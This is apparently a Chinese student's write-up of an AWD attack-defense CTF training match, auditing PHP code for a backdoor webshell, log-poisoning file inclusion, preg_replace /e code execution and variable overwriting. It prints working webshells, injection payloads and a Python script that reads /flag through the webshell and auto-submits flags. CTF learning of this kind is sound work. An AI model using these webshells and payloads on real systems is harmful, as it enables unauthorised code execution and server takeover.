寒假AWD训练之初学代码审计

寒假在家，老师组织了AWD训练赛，还是实战出真知，感觉比赛的学习效率是真的高。做个小总结。
也是刚入门，欢迎大佬斧正。

漏洞1：webshell.php

第一个漏洞是后门的，是一句话木马。

<?php @eval($_POST['moxiaoxi']) ?>

很简单，没有什么难度，可以直接菜刀，但是菜刀不能批量自动化获取flag。所以，尝试着写脚本。

import requests
url="http:127.0.0.1"
shell='/webshell.php'
passwd="moxiaoxi"
port='8081'
payload={"moxiaoxi":"system('cat /flag');"
}
url1=url+':'+port+shell
#print(url1)
response=requests.post(url1,payload,timeout=3)
print(response.text)

也可以直接自动化提交。后来有参考了大佬的脚本，改成了可以自动提交的，有点乱，看下思路凑合把（狗头保命）。

import requests
import timeurl="http:127.0.0.1"
shell='/webshell.php'
passwd="moxiaoxi"
port='8081'
payload={"moxiaoxi":"system('cat /flag');"
}
url1=url+':'+port+shelldef up_flag(flag_str):#提交flagheaders = {}print(headers)cookies = {'UM_distinctid': '16fa6e4c4bf175-0678e737cc08938-4c322d7e-144000-16fa6e4c4c02c6','CNZZDATA5082706': 'cnzz_eid%3D1753167733-1579049037-%26ntime%3D1579054437'}url_flag = 'http://47.114.48.65:9090/'data = {'token': 'd23014055f809da3115dd43960fd750c'}data['flag'] = flag_strtry:r = requests.post(url=url_flag, data=data, timeout=3, headers=headers, cookies=cookies)r_ii = re.findall("hulla.send(.*?);</script>", r.text)#提取回显print(r_ii)#查看提交是否成功except:pass
while(1):response=requests.post(url1,payload,timeout=3)flag=response.textup_flag(flag)time.sleep(50)#50秒获取并提交一次

漏洞2：文件包含+报错日志一句话木马

这个是看着大佬之前的讲解做的。看源码分析：

<?php
require_once("library/common.php");//有loadFile()方法
require_once("library/view.php");//有echoContent()方法
$view_class = new View();
$data = array();
if (isset($_GET['page']))
{$data['page'] = filter($_GET['page']);
}
else{$data['page'] = 'js';
}
$view_class->echoContent($data['page'], $data);//使用echoContent()方法。
?>

我们进入view.php，比较多，我们看几个关键部分

function echoContent($vId, $data)//如果我们访问index。php的话//$vId=$data['page'];$data=$data，可以看上面的index.php{$this->data = $data;      $content = loadFile("views/".$vId.".php");//common.php里loadFile("views/*.php"),*为data['page']//$content是views/*.php里的内容   $content = $this->parseHeadAndFoot($content);$content = $this->parseVal($content);$content = $this->parseIf($content);}

那我们再看看common.php里的loadFile()，这也是漏洞2的关键点。

function loadFile($filePath)//$filePath="views/*.php",*为data['page']
{global $cfg_basedir;if(!file_exists($filePath)){//如果不存在views/*.phpwrite_log('Try to open Null file:'.$filePath);//连“views/*.php”一块写入日志文件。注意！！*是data[page]，即可控return file_get_contents($cfg_basedir.'/error.php');}$fp = @fopen($filePath,'r');$sourceString = @fread($fp,filesize($filePath));//把views.php/md5.php 写入 $sourceString@fclose($fp);return $sourceString;
}

因为views/*.php里的*可控，我们可以构造一句话木马，<?php @eval($_POST['pass']) ?>，再接着我们访问这个日志文件，不就菜刀连过去了嘛，狗头。仔细查看函数，找到了日志文件路径。

但是

看后台文件

.htaccess里的内容。

.htaccess是什么
概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
也就是我们访问不了这个文件，怎么办。继续审计（看大佬讲解）。还有一个action.php

action.php
<?php
require_once("library/common.php");//包含了common.php
require_once("library/view.php");//包含了view.php
$page = filter($_POST['page']).'.php';//我们post过去page，自动给我们加上后缀，求之不得啊
$post_data = array();
foreach ($_POST as $key => $value) {$post_data[$key] = $value;
}
if (file_exists($page))//如果存在，就包含，那我们就可以把之前的日志文件包含进来利用
{@require_once($page);
}
?>
view.php
function filter($input)
{return str_replace('.', '', $input);//替换.为空
}

所以我们捋一下思路：
访问index.php，将data[‘page’]作为参数$vId传进view.php的echoContent()方法，简单拼接后变成/view/*.php(*即data[‘page’])，传进loadFile()方法，而loadFile()会检查这个拼接后的文件存在不在，不存在的话就会连同报错和“/view/*.php”，一块写进报错日志文件，像这样

所以我们可以将文件名也就是data[‘page’]构造成一句话上传，构造的url为

http://218.78.48.61:8801/index.php?page=<?php @eval($_POST['pass'])?>

报错写入日志，

然后访问该日志文件，但是被拒绝。看到action.php可以将日志文件包含，所以这次访问action.php，并且构造post传参，获得flag。

漏洞3：文件包含+ preg_replace /e 修饰符下的代码漏洞

文件包含还是在action.php里
preg_replace /e 模式下的代码漏洞在normaliz.php里，分析一下关键部位的代码

<?php
require_once("library/common.php");
require_once("library/view.php");
function action($post_data, $ip_replacement, $mail_replacement){foreach ($post_data as $key => $value) {$$key = $value;//变量覆盖}try{if ($method == '/\\d+\\.\\d+\\.\\d+\\.\\d+/')//我们可以同各国变量覆盖，把$method重写{$res = preg_replace($method, $ip_replacement, $source);//这三个变量都因变量覆盖可控//mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) // /e 修饰符使 preg_replace() 将 replacement 参数当作 PHP 代码（在适当的逆向引用替换完之后）。}else{$res = preg_replace($method, $mail_replacement, $source);//同上}}catch(Exception $e){write_log($e->getMessage());$res=$source;}return $res;
}
$view_class = new View();
$data = array();
$data['page'] = 'normaliz';
$ip_replacement = '222.222.222.222';
$mail_replacement = 'lollol@lol.com';
$data['res'] = action($post_data, $ip_replacement, $mail_replacement);//细看可控的变量
$view_class->echoContent($data['page'], $data);
?>

所以我们可以构造post传参

page=normaliz&res=&method=/a/e&mail_replacement=system('dir');&source=a

漏洞4：文件包含+变量覆盖

文件包含还是action.php的文件包含。
变量覆盖在md5.php里

<?php
require_once("library/common.php");
require_once("library/view.php");function action($post_data){foreach ($post_data as $key => $value) {$$key = $value;//$$变量覆盖，例如$post_data['a']='x',经过这个会变成// $a=x}if ($method==='md5'){//只要$post_data没有['method'],不会进入判断执行$res = md5($source);}if ($method==='sha1'){$res = sha1($source);}return $res;//我们可以控制$res,比如$post_data['res']='x'
}
$view_class = new View();
$data = array();
$data['page'] = 'md5';
$data['res'] = action($post_data);//根据变量覆盖，我们可以控制res
$view_class->echoContent($data['page'], $data);//可以看到，又进入这个函数了
?>

还是进入view.php里分析

function echoContent($vId, $data)//$vId=$data[page]='md5';因为要包含md5.php//$data=array('page'=>'md5','res'=>'***可控***'){$this->data = $data;        $content = loadFile("views/".$vId.".php");//common.php里loadFile("views/md5.php")//$content是views/md5.php里的内容    $content = $this->parseHeadAndFoot($content);//将$content里的{chinaz:header}/{chinaz:footer}替换为header.php里的内容$content = $this->parseVal($content);//将$content里的{?**?}替换,若**在 $data 里，就替换，如不在，替换为“”//例如，$data['res']=aa,那么{?res?}替换为aa；如果$data没有res，就替换为“”$content = $this->parseIf($content);//漏洞触发点}

data在经过echoContent函数效果就是。（具体细节见文末view.php注释版）

，构造post传参

page=md5&res="or @eval($_POST['pass']) or "&pass=phpinfo();

千言万语不如一张图，后期我会把思路图、流程图换上去。
源码分析注释见我的csdn下载,免费